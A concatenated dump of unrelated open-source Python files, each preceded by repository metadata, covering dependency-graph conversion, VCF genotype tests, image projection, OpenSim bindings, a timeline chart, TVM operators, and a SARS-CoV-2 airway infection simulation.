id_to_rules[sentences].append(subgraphs)
graph_data = {}
noun_list = []
sentences += 1
continue
if line.startswith("# text"):
id_to_sentence[sentences] = line.strip()
if line.startswith("#"):
continue
if line != "\n":
fields = line.split("\t")
word_id = fields[0]
word = fields[2]
lemma = fields[1]
tree_pos = fields[3]
ud_pos = fields[4]
mor = fields[5]
head = fields[6]
ud_edge = fields[7]
comp_edge = fields[8]
space_after = fields[9]
make_default_structure(graph_data, word_id)
graph_data[word_id]["word"] = word_to_id[lemma.lower()]
graph_data[word_id]["tree_pos"] = sanitize_word(tree_pos)
graph_data[word_id]["mor"] = mor
make_default_structure(graph_data, head)
graph_data[head]["deps"][word_id] = ud_edge
return id_to_rules, id_to_sentence
def print_output(graph_data, graph_root):
print(make_graph_string(graph_data, graph_root))
def make_id_graph(graph_data, word_id, word_to_id):
graph_string = "({1}_{0} / {1}_{0}".format(str(word_id),
word_to_id[graph_data[word_id]["word"]])
for other_id in graph_data[word_id]["deps"]:
edge = graph_data[word_id]["deps"][other_id]
graph_string += ' :{0} '.format(edge.replace(':', '_'))
graph_string += make_id_graph(graph_data, other_id, word_to_id)
graph_string += ")"
return graph_string
def make_graph_string(graph_data, word_id):
graph_string = "({0} / {0}".format(graph_data[word_id]["word"])
for other_id in graph_data[word_id]["deps"]:
edge = graph_data[word_id]["deps"][other_id]
graph_string += ' :{0} '.format(edge.replace(':', '_'))
graph_string += make_graph_string(graph_data, other_id)
graph_string += ")"
return graph_string
def sanitize_pos(pos):
if pos == "HYPH":
pos = "PUNCT"
pos = pos.replace("|", "PIPE")
pos = pos.replace("=", "EQUAL")
is_punct = True
for character in pos:
if character not in REPLACE_MAP:
is_punct = False
if is_punct == True:
return "PUNCT"
else:
return pos
def convert(conll_file, word_to_id):
sentences = []
graphs = []
words = defaultdict(int)
id_to_sentences = {}
id_to_graph = {}
id_to_idgraph = {}
with open(conll_file) as conll_file:
graph_data = {}
graph_root = "0"
sen_id = 0
for line in conll_file:
if line == "\n":
print(json.dumps(graph_data))
graph = make_graph_string(graph_data, graph_root)
id_graph = make_id_graph(graph_data, graph_root, word_to_id)
graphs.append(graph)
id_to_graph[sen_id] = graph
id_to_idgraph[sen_id] = id_graph
graph_data = {}
graph_root = "0"
words = defaultdict(int)
sen_id += 1
continue
if line.startswith("# text ="):
sentence = line.split("=")[1]
graphs.append(line.strip())
id_to_sentences[sen_id] = line.strip()
continue
elif line.startswith("#") or not line:
continue
fields = line.split("\t")
dep_word_id = fields[0]
dep_word = fields[1].lower()
words[dep_word] += 1
tree_pos = sanitize_word(sanitize_pos(fields[3]))
ud_pos = fields[4]
root_word_id = fields[6]
ud_edge = fields[7]
make_default_structure(graph_data, dep_word_id)
graph_data[dep_word_id]["word"] = dep_word
graph_data[dep_word_id]["tree_pos"] = tree_pos
graph_data[dep_word_id]["ud_pos"] = sanitize_word(ud_pos)
"""
for the head; store the edges with the head of the dependency
"""
# Ignore :root dependencies,
# but remember the root word of the graph
if "0" != root_word_id:
make_default_structure(graph_data, root_word_id)
graph_data[root_word_id]["deps"][dep_word_id] = ud_edge
else:
graph_root = dep_word_id
with open("ewt_graphs", "w") as f:
f.write("# IRTG unannotated corpus file, v1.0\n")
f.write("# interpretation ud: de.up.ling.irtg.algebra.graph.GraphAlgebra\n")
for graph in graphs:
f.write(graph + "\n")
with open("ewt_sentences", "w") as f:
for sentence in sentences:
f.write(sentence + "\n")
return id_to_graph, id_to_sentences, id_to_idgraph
def make_default_structure(graph_data, word_id):
if word_id not in graph_data:
graph_data[word_id] = {
"word": "",
"deps": {},
}
def main():
args = get_args()
convert(args.conll_file)
if __name__ == "__main__":
main()
| 2.90625 | 3 |
cyvcf2/tests/test_hemi.py | leoisl/cyvcf2 | 307 | 12757382 | import numpy as np
from cyvcf2 import VCF, Variant, Writer
import os.path
HERE = os.path.dirname(__file__)
HEM_PATH = os.path.join(HERE, "test-hemi.vcf")
VCF_PATH = os.path.join(HERE, "test.vcf.gz")
def check_var(v):
s = [x.split(":")[0] for x in str(v).split("\t")[9:]]
lookup = {'0/0': 0, '0/1': 1, './1': 1, '1/.': 1, '0/.': 0, './0': 0, '1/1': 3, '.': 2, './.': 2}
expected = np.array([lookup[ss] for ss in s])
obs = v.gt_types
assert np.all(expected == obs), zip(expected, obs)
def test_hemi():
"""
make sure that we are getting the correct gt_types
for hemizygous variants
"""
for p in (HEM_PATH, VCF_PATH):
vcf = VCF(p)
for v in vcf:
check_var(v)
| 2.5 | 2 |
pyclesperanto_prototype/_tier1/_standard_deviation_z_projection.py | DrLachie/pyclesperanto_prototype | 0 | 12757383 | from .._tier0 import execute
from .._tier0 import plugin_function
from .._tier0 import Image
from .._tier0 import create_2d_yx
@plugin_function(output_creator=create_2d_yx, categories=['projection', 'in assistant'])
def standard_deviation_z_projection(source : Image, destination : Image = None) -> Image:
"""Determines the standard deviation intensity projection of an image
stack along Z.
Parameters
----------
source : Image
destination : Image, optional
Returns
-------
destination
Examples
--------
>>> import pyclesperanto_prototype as cle
>>> cle.standard_deviation_z_projection(source, destination)
References
----------
.. [1] https://clij.github.io/clij2-docs/reference_standardDeviationZProjection
"""
parameters = {
"dst":destination,
"src":source,
}
execute(__file__, '../clij-opencl-kernels/kernels/standard_deviation_z_projection_x.cl', 'standard_deviation_z_projection', destination.shape, parameters)
return destination
| 2.171875 | 2 |
Bindings/Python/tests/test_access_subcomponents.py | justicelee/opensim-core | 2 | 12757384 | <reponame>justicelee/opensim-core
"""
Test that sockets, inputs, and outputs are functional in python.
"""
import os, unittest
import opensim as osim
test_dir = os.path.join(os.path.dirname(os.path.abspath(osim.__file__)),
'tests')
# Silence warning messages if mesh (.vtp) files cannot be found.
osim.Model.setDebugLevel(0)
class TestAccessSubcomponents(unittest.TestCase):
def test_individual_components(self):
model = osim.Model(os.path.join(test_dir, "arm26.osim"))
muscle = model.getComponent('BICshort')
assert muscle.getName() == 'BICshort'
# No downcasting necessary!
muscle.get_max_isometric_force() # Method on Muscle.
muscle = model.updComponent('BICshort')
muscle.set_max_isometric_force(100)
def test_component_list(self):
model = osim.Model(os.path.join(test_dir, "arm26.osim"))
num_components = 0
for comp in model.getComponentsList():
num_components += 1
assert num_components > 0
num_bodies = 0
for body in model.getBodyList():
num_bodies += 1
body.getMass()
assert num_bodies == 2
num_joints = 0
for joint in model.getJointList():
num_joints += 1
joint.numCoordinates()
assert num_joints == 2
# Custom filtering.
num_bodies = 0
for frame in model.getFrameList():
body = osim.Body.safeDownCast(frame)
if body != None:
num_bodies += 1
print(body.getName())
body.getInertia()
assert num_bodies == 2
model = osim.Model()
thelenMuscle = osim.Thelen2003Muscle("Darryl", 1, 0.5, 0.5, 0)
millardMuscle = osim.Millard2012EquilibriumMuscle("Matt", 1, 0.5,
0.5, 0)
model.addComponent(thelenMuscle)
model.addComponent(millardMuscle)
# Total number of muscles is 2.
assert len(set(model.getMuscleList())) == 2
for muscle in model.getMuscleList():
assert (isinstance(muscle, osim.Thelen2003Muscle) or
isinstance(muscle, osim.Millard2012EquilibriumMuscle))
# There is exactly 1 Thelen2003Muscle.
assert len(set(model.getThelen2003MuscleList())) == 1
for muscle in model.getThelen2003MuscleList():
assert isinstance(muscle, osim.Thelen2003Muscle)
# There is exactly 1 Millard2012EquilibriumMuscle.
assert len(set(model.getMillard2012EquilibriumMuscleList())) == 1
for muscle in model.getMillard2012EquilibriumMuscleList():
assert isinstance(muscle, osim.Millard2012EquilibriumMuscle)
def test_component_filter(self):
model = osim.Model(os.path.join(test_dir, "arm26.osim"))
comps = model.getMuscleList()
comps.setFilter(osim.ComponentFilterAbsolutePathNameContainsString('BIC'))
count = 0
BICnames = ['BIClong', 'BICshort']
for comp in comps:
assert comp.getName() == BICnames[count]
# The ComponentList iterator does the downcasting for us!
assert type(comp) == osim.Thelen2003Muscle
count += 1
assert count == 2
| 2.421875 | 2 |
haziris/examples/google_timeline_grouping.py | haziris/haziris-python | 1 | 12757385 | import pandas as pd
import haziris as hz
df = pd.DataFrame([
['President' , '<NAME>', '1789-04-30 00:00:00', '1797-03-04 00:00:00' ],
['President' , '<NAME>' , '1797-03-04 00:00:00', '1801-03-04 00:00:00' ],
['President' , '<NAME>' , '1801-03-04 00:00:00', '1809-03-04 00:00:00' ],
['Vice President' , '<NAME>' , '1789-04-21 00:00:00', '1797-03-04 00:00:00' ],
['Vice President' , '<NAME>' , '1797-03-04 00:00:00', '1801-03-04 00:00:00' ],
['Vice President' , '<NAME>' , '1801-03-04 00:00:00', '1805-03-04 00:00:00' ],
['Vice President' , '<NAME>' , '1805-03-04 00:00:00', '1812-04-20 00:00:00' ],
['Secretary of State', '<NAME>' , '1789-09-26 00:00:00', '1790-03-22 00:00:00' ],
['Secretary of State', '<NAME>' , '1790-03-22 00:00:00', '1793-12-31 00:00:00' ],
['Secretary of State', '<NAME>' , '1794-01-02 00:00:00', '1795-08-20 00:00:00' ],
['Secretary of State', '<NAME>', '1795-08-20 00:00:00', '1800-05-12 00:00:00' ],
['Secretary of State', '<NAME>' , '1800-05-13 00:00:00', '1800-06-05 00:00:00' ],
['Secretary of State', '<NAME>' , '1800-06-13 00:00:00', '1801-03-04 00:00:00' ],
['Secretary of State', '<NAME>' , '1801-03-05 00:00:00', '1801-05-01 00:00:00' ],
['Secretary of State', '<NAME>' , '1801-05-02 00:00:00', '1809-03-03 00:00:00' ]
],
columns = ['Position', 'Name', 'Start', 'End']
)
options = {
'timeline': {
'showRowLabels': False
}
}
hz.google_timeline_chart( df, "google_timeline_grouping.html", options )
| 2.421875 | 2 |
python/tvm/tir/op.py | Orion34C/incubator-tvm | 1 | 12757386 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=redefined-builtin
"""Operators used in TIR expression."""
import tvm._ffi
from tvm.runtime import convert, const
from tvm.schedule import Buffer
from .expr import Call
from . import _ffi_api
def _pack_buffer(buf):
"""Build intrinsics that packs the buffer.
"""
assert buf.shape
shape = Call("handle", "tvm_stack_make_shape", buf.shape,
Call.Intrinsic, None, 0)
strides = Call("handle", "tvm_stack_make_shape", buf.strides,
Call.Intrinsic, None, 0) if buf.strides else 0
pack_args = [buf.data,
shape,
strides,
len(buf.shape),
const(0, dtype=buf.dtype),
buf.elem_offset]
return Call("handle", "tvm_stack_make_array",
pack_args, Call.Intrinsic, None, 0)
def call_packed(*args):
"""Build expression by call an external packed function.
The argument to packed function can be Expr or Buffer.
The argument is the corresponding POD type when Expr is presented.
When the argument is Buffer, the corresponding PackedFunc
will recieve an TVMArrayHandle whose content is valid during the callback period.
If the PackedFunc is a python callback, then the corresponding argument is NDArray.
Parameters
----------
args : list of Expr or Buffer.
Positional arguments.
Returns
-------
call : PrimExpr
The call expression.
See Also
--------
tvm.extern : Create tensor with extern function call.
"""
call_args = [_pack_buffer(x) if isinstance(x, Buffer) else x for x in args]
return Call(
"int32", "tvm_call_packed", call_args, Call.Intrinsic, None, 0)
def call_pure_intrin(dtype, func_name, *args):
"""Build expression by calling a pure intrinsic function.
Intrinsics can be overloaded with multiple data types via
the intrinsic translation rule.
Parameters
----------
dtype : str
The data type of the result.
func_name: str
The intrinsic function name.
args : list
Positional arguments.
Returns
-------
call : PrimExpr
The call expression.
"""
args = convert(args)
return Call(
dtype, func_name, convert(args), Call.PureIntrinsic, None, 0)
def call_intrin(dtype, func_name, *args):
"""Build expression by calling an intrinsic function.
Intrinsics can be overloaded with multiple data types via
the intrinsic translation rule.
Parameters
----------
dtype : str
The data type of the result.
func_name: str
The intrinsic function name.
args : list
Positional arguments.
Returns
-------
call : PrimExpr
The call expression.
"""
args = convert(args)
return Call(
dtype, func_name, convert(args), Call.Intrinsic, None, 0)
def call_pure_extern(dtype, func_name, *args):
"""Build expression by calling a pure extern function.
Parameters
----------
dtype : str
The data type of the result.
func_name: str
The extern function name.
args : list
Positional arguments.
Returns
-------
call : PrimExpr
The call expression.
"""
return Call(
dtype, func_name, convert(args), Call.PureExtern, None, 0)
def call_extern(dtype, func_name, *args):
"""Build expression by calling a extern function.
Parameters
----------
dtype : str
The data type of the result.
func_name: str
The extern function name.
args : list
Positional arguments.
Returns
-------
call : PrimExpr
The call expression.
"""
return Call(
dtype, func_name, convert(args), Call.Extern, None, 0)
def call_llvm_intrin(dtype, name, *args):
"""Build expression by calling an llvm intrinsic function
Parameters
----------
dtype : str
The data type of the result.
name : str
The name of the llvm intrinsic function.
args : list
Poistional arguments.
Returns
-------
call : PrimExpr
The call expression.
"""
# pylint: disable=import-outside-toplevel
from tvm.target import codegen
llvm_id = codegen.llvm_lookup_intrinsic_id(name)
assert llvm_id != 0, "%s is not an LLVM intrinsic" % name
return call_pure_intrin(dtype, 'llvm_intrin', tvm.const(llvm_id, 'uint32'), *args)
@tvm._ffi.register_func("tvm.default_trace_action")
def _tvm_default_trace_action(*args):
print(list(args))
def trace(args, trace_action="tvm.default_trace_action"):
"""Trace tensor data at the runtime.
The trace function allows to trace specific tensor at the
runtime. The tracing value should come as last argument.
The trace action should be specified, by default
tvm.default_trace_action is used.
Parameters
----------
args : list of Expr or Buffers.
Positional arguments.
trace_action : str.
The name of the trace action.
Returns
-------
call : PrimExpr
The call expression.
See Also
--------
tvm.tir.call_packed : Creates packed function.
"""
if not isinstance(args, list):
raise Exception("tvm.trace consumes the args as list type")
call_args = [_pack_buffer(x) if isinstance(x, Buffer) else x for x in args]
call_args.insert(0, trace_action)
return tvm.tir.Call(
args[-1].dtype, "tvm_call_trace_packed", call_args, tvm.tir.Call.Intrinsic, None, 0)
def min_value(dtype):
"""minimum value of dtype
Parameters
----------
dtype : str
The data type.
Returns
-------
value : tvm.Expr
The minimum value of dtype.
"""
return _ffi_api.min_value(dtype)
def max_value(dtype):
"""maximum value of dtype
Parameters
----------
dtype : str
The data type.
Returns
-------
value : tvm.Expr
The maximum value of dtype.
"""
return _ffi_api.max_value(dtype)
def exp(x):
"""Take exponetial of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "exp", x)
def erf(x):
"""Take gauss error function of the input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "erf", x)
def tanh(x):
"""Take hyperbolic tanh of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "tanh", x)
def sigmoid(x):
"""Quick function to get sigmoid
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "sigmoid", x)
def log(x):
"""Take log of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "log", x)
def cos(x):
"""Take cos of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "cos", x)
def sin(x):
"""Take sin of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "sin", x)
def atan(x):
"""Take atan of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "atan", x)
def sqrt(x):
"""Take square root of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "sqrt", x)
def rsqrt(x):
"""Take reciprocal of square root of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "rsqrt", x)
def floor(x):
"""Take floor of float input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.floor(x)
def ceil(x):
"""Take ceil of float input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.ceil(x)
def trunc(x):
"""Get truncated value of the input.
The truncated value of the scalar x is the
nearest integer i which is closer to zero than x is.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.trunc(x)
def abs(x):
"""Get absolute value of the input element-wise.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.abs(x)
def round(x):
"""Round elements of the array to the nearest integer.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.round(x)
def nearbyint(x):
"""Round elements of the array to the nearest integer.
This intrinsic uses llvm.nearbyint instead of llvm.round
which is faster but will results different from tvm.round.
Notably nearbyint rounds according to the rounding mode,
whereas tvm.round (llvm.round) ignores that.
For differences between the two see:
https://en.cppreference.com/w/cpp/numeric/math/round
https://en.cppreference.com/w/cpp/numeric/math/nearbyint
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.nearbyint(x)
def isnan(x):
"""Check if input value is Nan.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.isnan(x)
def power(x, y):
"""x power y
Parameters
----------
x : PrimExpr
Input argument.
y : PrimExpr
The exponent
Returns
-------
z : PrimExpr
The result.
"""
return _ffi_api._OpPow(convert(x), convert(y))
def popcount(x):
"""Count the number of set bits in input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "popcount", x)
def fmod(x, y):
"""Return the remainder of x divided by y with the same sign as x.
Parameters
----------
x : PrimExpr
Input argument.
y : PrimExpr
Input argument.
Returns
-------
z : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "fmod", x, y)
def if_then_else(cond, t, f):
"""Conditional selection expression.
Parameters
----------
cond : PrimExpr
The condition
t : PrimExpr
The result expression if cond is true.
f : PrimExpr
The result expression if cond is false.
Returns
-------
result : Node
The result of conditional expression.
Note
----
Unlike Select, if_then_else will not execute
the branch that does not satisfy the condition.
You can use it to guard against out of bound access.
Unlike Select, if_then_else cannot be vectorized
if some lanes in the vector have different conditions.
"""
return _ffi_api._OpIfThenElse(convert(cond), convert(t), convert(f))
def div(a, b):
"""Compute a / b as in C/C++ semantics.
Parameters
----------
a : PrimExpr
The left hand operand, known to be non-negative.
b : PrimExpr
The right hand operand, known to be non-negative.
Returns
-------
res : PrimExpr
The result expression.
Note
----
When operands are integers, returns truncdiv(a, b).
"""
return _ffi_api._OpDiv(a, b)
def indexdiv(a, b):
"""Compute floor(a / b) where a and b are non-negative.
Parameters
----------
a : PrimExpr
The left hand operand, known to be non-negative.
b : PrimExpr
The right hand operand, known to be non-negative.
Returns
-------
res : PrimExpr
The result expression.
Note
----
Use this function to split non-negative indices.
This function may take advantage of operands'
non-negativeness.
"""
return _ffi_api._OpIndexDiv(a, b)
def indexmod(a, b):
"""Compute the remainder of indexdiv. a and b are non-negative.
Parameters
----------
a : PrimExpr
The left hand operand, known to be non-negative.
b : PrimExpr
The right hand operand, known to be non-negative.
Returns
-------
res : PrimExpr
The result expression.
Note
----
Use this function to split non-negative indices.
This function may take advantage of operands'
non-negativeness.
"""
return _ffi_api._OpIndexMod(a, b)
def truncdiv(a, b):
"""Compute the truncdiv of two expressions.
Parameters
----------
a : PrimExpr
The left hand operand
b : PrimExpr
The right hand operand
Returns
-------
res : PrimExpr
The result expression.
Note
----
This is the default integer division behavior in C.
"""
return _ffi_api._OpTruncDiv(a, b)
def truncmod(a, b):
"""Compute the truncmod of two expressions.
Parameters
----------
a : PrimExpr
The left hand operand
b : PrimExpr
The right hand operand
Returns
-------
res : PrimExpr
The result expression.
Note
----
This is the default integer division behavior in C.
"""
return _ffi_api._OpTruncMod(a, b)
def floordiv(a, b):
"""Compute the floordiv of two expressions.
Parameters
----------
a : PrimExpr
The left hand operand
b : PrimExpr
The right hand operand
Returns
-------
res : PrimExpr
The result expression.
"""
return _ffi_api._OpFloorDiv(a, b)
def floormod(a, b):
"""Compute the floormod of two expressions.
Parameters
----------
a : PrimExpr
The left hand operand
b : PrimExpr
The right hand operand
Returns
-------
res : PrimExpr
The result expression.
"""
return _ffi_api._OpFloorMod(a, b)
| 1.960938 | 2 |
kernel_model_URT.py | mathalexchen/SARS-CoV-2_model | 0 | 12757387 | <reponame>mathalexchen/SARS-CoV-2_model<gh_stars>0
import numpy as np
import time
try:
from infection_model_cython_URT import infection_model
from infection_model_URT import *
except:
print("You may need to run setup on setup_infection_model_URT. Use 64-bit python in order to not run into memory issues.")
import pdb
import bisect
import itertools
import pandas as pd
# internal modules
import save_data
import summarize_data_and_plot as summarize
from copy_sim_dir import *
from time_profiler import Timer
class InfectionModelSimulation:
def __init__(self, sim):
a = time.time()
_, self.pos_y, self.pos_z, self.arrival_times, self.infected_dict = run_sim(sim)
print("Time =", time.time()-a)
class InfectedCell:
def __init__(self, sim, pos, t, inf_model):
self.t = t
self.pos = pos
self.CELL_DIAM = sim.CELL_DIAM
self.length = sim.lung.length[sim.gen]
self.v_adv = sim.v_adv
self.get_virus_prod_times(sim, inf_model)
self.get_sample(inf_model)
def get_virus_prod_times(self, sim, inf_model):
virion_prod_time = 24*3600/sim.virions_shed_per_day
self.num_virus = max(0, int(round((sim.num_days*24*3600 - self.t - sim.latency_time*24*3600)/virion_prod_time)))
self.prod_times = np.round(np.arange(self.t + sim.latency_time*24*3600, sim.num_days*24*3600, virion_prod_time),2)
self.prod_times = self.prod_times[:self.num_virus]
def get_sample(self, inf_model):
choice = np.random.choice(range(len(inf_model.pos_y)), self.num_virus, replace = False)
self.pos_y = inf_model.pos_y[choice]
self.pos_z = inf_model.pos_z[choice]
self.arrival_times = inf_model.arrival_times[choice] + self.prod_times
idx = np.where((self.pos[0] + self.pos_y)*self.CELL_DIAM <= self.length)
exit_idx = list(set(range(self.num_virus)).difference(idx[0]))
self.exit_times = self.prod_times + (self.length - (self.pos[0]*self.CELL_DIAM))/self.v_adv
self.exit_times = self.exit_times[exit_idx]
self.prod_times_exit = self.prod_times[exit_idx]
self.pos_y = self.pos_y[idx]
self.pos_z = self.pos_z[idx]
self.arrival_times = self.arrival_times[idx]
self.prod_times = self.prod_times[idx]
self.flux_out = self.num_virus - len(idx[0])
del choice
# clears up pos_y, pos_z, prod_times, arrival_times, the largest storage
def reduce_storage_space(self):
del self.pos_y
del self.pos_z
del self.prod_times
del self.arrival_times
class DistanceRanking:
def __init__(self, dim):
li = list(itertools.product(range(-dim, dim + 1), range(-dim, dim + 1)))
sorted_li = sorted(li, key = lambda x: x[0]**2 + x[1]**2)
self.dist_li = [[]]
cur_dist = 0
cur_element = 0
for element in sorted_li:
if element[0]**2 + element[1]**2 != cur_dist:
self.dist_li.append([])
cur_element += 1
cur_dist = element[0]**2 + element[1]**2
self.dist_li[cur_element].append(element)
self.dist_li = self.dist_li[1:] # cut out (0, 0)
self.NUM_ROWS = 1000
self.row_num = np.zeros(len(self.dist_li)) # how many rows of each distance rank have been used up
self.dist_group = 0
self.count = 0 # how many entries of the given dist_li[i] used up
self.distances = []
for i in range(len(self.dist_li)):
arr = np.tile(np.arange(len(self.dist_li[i])), (self.NUM_ROWS, 1))
self.distances.append(arr)
def get_next_element(self):
if self.count == len(self.dist_li[self.dist_group]): # go to next dist group
self.row_num[self.dist_group] += 1
self.dist_group += 1
self.count = 0
if self.row_num[self.dist_group] % self.NUM_ROWS == 0:
arr = self.permute_each_row(self.distances[self.dist_group])
self.element = self.dist_li[self.dist_group][self.count]
self.count += 1
return self.element
def update_infected_cell_found(self):
self.row_num[self.dist_group] += 1
self.count = 0
self.dist_group = 0
def permute_each_row(self, s):
return s[np.arange(len(s))[:,None], np.random.randn(*s.shape).argsort(axis=1)]
class FullModel:
def __init__(self, sim, sim_folder):
self.sim = sim
self.sim_folder = sim_folder
self.inf_model = InfectionModelSimulation(sim)
self.dist_rank = DistanceRanking(3)
self.infection_times = [0]
self.infected_coord_dict = {(0,0): 0}
self.infected_time_dict = {0: [(0,0)]}
self.t = 0
self.cell_li = []
self.free_virion_dist = np.zeros(int(sim.num_days*1440))
self.randu_count = 0
num = 0
a = time.time()
while num < len(self.infection_times):
try:
coords = self.infected_time_dict[self.infection_times[num]]
except:
pdb.set_trace()
for i in range(len(coords)):
if not sim.restrict_to_gen or coords[i][0]*sim.CELL_DIAM <= self.sim.lung.length[self.sim.gen]:
cell = InfectedCell(sim, coords[i], self.infection_times[num], self.inf_model)
self.update_infected_dict(cell)
self.update_free_virion_dist(cell)
cell.reduce_storage_space()
self.cell_li.append(cell)
if len(self.cell_li) % 1000 == 0:
print("At cell: ", len(self.cell_li), cell.t/3600/24)
num += len(coords)
print("Time =", time.time() - a)
self.calculate_flux_out()
self.summarize_and_plot()
def update_free_virion_dist(self, cell):
for i in range(len(cell.arrival_times)):
start = int(cell.prod_times[i]//60)
finish = int(cell.arrival_times[i]//60)
self.free_virion_dist[start:finish] = self.free_virion_dist[start:finish] + 1
for i in range(len(cell.prod_times_exit)):
start = int(cell.prod_times_exit[i]//60)
finish = int(cell.exit_times[i]//60)
self.free_virion_dist[start:finish] = self.free_virion_dist[start:finish] + 1
def calculate_flux_out(self):
self.flux_out = 0
self.exit_times = np.array([])
with open(os.path.join(self.sim_folder, "flux.txt"), "ab") as f:
for cell in self.cell_li:
self.flux_out += cell.flux_out
np.savetxt(f, cell.exit_times/(3600*24) - 0.5, fmt = "%10.5f")
def update_infected_dict(self, cell):
for i in range(len(cell.pos_y)):
candidate_y = cell.pos[0] + cell.pos_y[i]
candidate_z = cell.pos[1] + cell.pos_z[i]
candidate_y, candidate_z = self.adjust_pos((cell.pos[0] + cell.pos_y[i], cell.pos[1] + cell.pos_z[i]))
if (candidate_y, candidate_z) in self.infected_coord_dict:
if self.infected_coord_dict[(candidate_y, candidate_z)] > cell.arrival_times[i]:
if len(self.infected_time_dict[self.infected_coord_dict[(candidate_y, candidate_z)]]) == 1:
self.infected_time_dict.pop(self.infected_coord_dict[(candidate_y, candidate_z)])
else:
self.infected_time_dict[self.infected_coord_dict[(candidate_y, candidate_z)]].remove((candidate_y, candidate_z))
del self.infection_times[bisect.bisect_left(self.infection_times, self.infected_coord_dict[(candidate_y, candidate_z)])]
self.add_time_to_dict(candidate_y, candidate_z, cell.arrival_times[i])
else:
self.add_time_to_dict(candidate_y, candidate_z, cell.arrival_times[i])
def add_time_to_dict(self, pos_y, pos_z, arrival_time):
bisect.insort(self.infection_times, arrival_time)
self.infected_coord_dict[(pos_y, pos_z)] = arrival_time
if arrival_time in self.infected_time_dict:
self.infected_time_dict[arrival_time].append((pos_y, pos_z))
else:
self.infected_time_dict[arrival_time] = [(pos_y, pos_z)]
def adjust_pos(self, pos):
new_pos = pos
while True:
self.simulate_cell(new_pos)
if self.inf_model.infected_dict[new_pos[0]][new_pos[1]]:
self.dist_rank.update_infected_cell_found()
return new_pos
new_pos = np.array(pos) + self.dist_rank.get_next_element()
def simulate_cell(self, pos):
if pos[0] in self.inf_model.infected_dict and pos[1] in self.inf_model.infected_dict[pos[0]]:
return
if pos[0] not in self.inf_model.infected_dict:
self.inf_model.infected_dict[pos[0]] = {}
if self.randu_count % 10000 == 0:
self.randu = np.random.rand(10000)
if self.randu[self.randu_count % 10000] < self.sim.infectible_perc:
self.inf_model.infected_dict[pos[0]][pos[1]] = 1
else:
self.inf_model.infected_dict[pos[0]][pos[1]] = 0
self.randu_count += 1
def summarize_and_plot(self):
a = time.time()
total_virions = summarize.print_num_virus(self.cell_li)
try:
save_data.save_obj_components(self, self.sim_folder, "data")
except:
print("Error saving data!")
pdb.set_trace()
summarize.free_virions_over_time(self.free_virion_dist, self.sim_folder, self.sim, "free_virions")
if self.sim.v_adv != 0:
try:
if self.sim.gen in ["10", "15"]:
map, map_img_dim, zero_loc = summarize.infection_map_adv(self.infected_coord_dict, self.sim_folder, self.sim, "default", "infection_map_adv")
else:
map, map_img_dim, zero_loc = summarize.infection_map_adv(self.infected_coord_dict, self.sim_folder, self.sim, "compressed", "infection_map_adv")
except:
print("Error creating infection map!")
pdb.set_trace()
else:
map, map_img_dim, zero_loc = summarize.infection_map_adv(self.infected_coord_dict, self.sim_folder, self.sim, "default", "infection_map_adv")
try:
summarize.write_summary_data(self.cell_li, total_virions, map, map_img_dim, zero_loc, self.sim_folder, self.sim, "summary_data")
except:
print("Error summarizing data!")
pdb.set_trace()
try:
summarize.virus_production_times(self.cell_li, self.sim_folder, self.sim, "viral_load_adv")
except:
print("Error computing viral load!")
pdb.set_trace()
print("Time =", time.time() - a)
class LungParam:
def __init__(self, param_csv):
self.param_df = pd.read_csv(param_csv, sep = "\t")
self.param_df = self.param_df.set_index("Generation")
self.length = (self.param_df["Length (cm)"]*10000).to_dict()
def main():
Dv = 1.27 # um^2/s
PCL_THICKNESS = 7 # um
CELL_DIAM = 4 # um
CIRCUM = 150000 # diameter of nasal passage = 5 cm, so circumference = 50000\pi um
infection_prob = 0.3
NUM_VIRUS = 10000
infectible_perc = 0.5
virions_per_day = 2000
num_days = 2.02
latency_time = 0.5
virus_at_interface = 0
restrict_to_gen = False
MEMORY_CUTOFF = 10000 # simulate in smaller blocks
